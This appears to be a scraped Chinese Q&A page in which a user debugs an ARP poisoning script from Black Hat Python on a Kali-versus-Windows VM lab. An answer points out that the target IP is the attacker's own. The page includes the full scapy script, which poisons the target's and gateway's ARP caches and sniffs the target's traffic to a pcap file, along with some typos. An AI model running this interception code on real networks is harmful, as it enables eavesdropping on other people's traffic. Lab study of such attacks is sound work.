在Justin Seitz Black Hat Python书的第四章中,详细介绍了使用scapy进行ARP中毒的部分。 我有问题获取目标机器的目标ip的mac地址。 我使用的是Kali VM作为攻击机器,Win 7 VM作为目标机器。
from scapy.all import * import os import sys import threading import signal interface = "eth0" target_ip = "10.0.2.15" gateway_ip = "10.0.2.2" packet_count = 1000 def restore_target(gateway_ip,gateway_mac,target_ip,target_mac): print "[*} Restoring target..." send(ARP(op=2,psrc=gateway_ip,pdst=target_ip,hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5) send(Arp(op=2,psrc=target_ip,pdst=gateway_ip,hwsrc=target_mac),count=5) os.kill(os.getpid(),signal.SIGINT) def get_mac(ip_address): responses,unanswered = srp( Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),timeout=2,retry=10) for s,r in responses: return r[Ether].src return None def poison_target(gateway_ip,target_mac): poison_target = ARP() poison_target.op = 2 poison_target.psrc = gateway_ip poison_target.pdst = target_ip posion_target.hwdst = target_mac poison_gateway = ARP() poison_gateway.op = 2 poison_gateway.psrc = target_ip poison_gateway.pdst = gateway_ip poison_gateway.hwdst = gateway_mac print "[*] Beginning the ARP poison. [CTRL-C to stop]" while True: try: send(poison_target) send(poison_gateway) time.sleep(2) except KeyboardInterrupt: restore_target(gateway_ip,target_mac) print "[*] ARP poison attack finished." return conf.iface = interface conf.iface = interface conf.verb = 0 print "[*] Setting up %s" % interface gateway_mac = get_mac(gateway_ip) if gateway_mac is None: print "[!!!] Failed to get gateway MAC. Exiting." sys.exit(0) else: print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac) target_mac = get_mac(target_ip) if target_mac is None: print "[!!!] Failed to get target MAC. Exiting." sys.exit(0) else: print "[*] Target %s is at %s" % (target_ip,target_mac) poison_thread = threading.Thread(target=posion_target,args=( gateway_ip,target_mac)) poison_thread.start() try: print "[*] Starting sniffer for %d packets" % packet_count bpf_filter = "ip host %s" % target_ip packets = sniff(count=packet_count,filter=bpf_filter,iface=interface) wrpcap('arper.pcap',packets) restore_target(gateway_ip,target_mac) except KeyboardInterrupt: restore_target(gateway_ip,target_mac) sys.exit(0)
攻击机:
root@kali:~/Documents# ifconfig eth0: flags=4163<UP,broADCAST,RUNNING,MULTICAST> mtu 1500 inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255 inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link> ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet) RX packets 101529 bytes 101906744 (97.1 MiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 34775 bytes 3530239 (3.3 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 218 bytes 13972 (13.6 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 218 bytes 13972 (13.6 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py [*] Setting up eth0 [*] Gateway 10.0.2.2 is at 52:54:00:12:35:02 [!!!] Failed to get target MAC. Exiting.
configurationARP老化超时
用于安全更新和修补程序的registry项位置
在侦听数据包时,我遇到了Linux的networking堆栈问题
从已知的MAC地址使用ARP获取未知的IP地址?
SendARP相当于Linux
如何查询指定邻居的IPv6 NDP(邻居发现协议)表
Android ARP清除时间
在Linux 2.6.21上执行ARP和逆向ARP(glibc 2.3.5)
将arp绑定添加到ARP表Linux中
你使用kali(攻击机器)的IP作为target_ip (10.0.2.15)。 Win运行在同一台计算机上,但是在一台虚拟机上,通常一台虚拟机拥有自己的IP( https://www.quora.com/Do-virtual-machines-have-their-own-IP )
如果虚拟机上的Win自动运行在同一个网络上,甚至不能确定。 在同一个/24网络(即10.0.2.x / 24 – 替换x)为VM和kali分配静态IP请参阅https://serverfault.com/questions/839443/giving-the-vm-an-自己的IP地址的
编码器是正确的:首先检查是否通过ping建立网络连接
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。
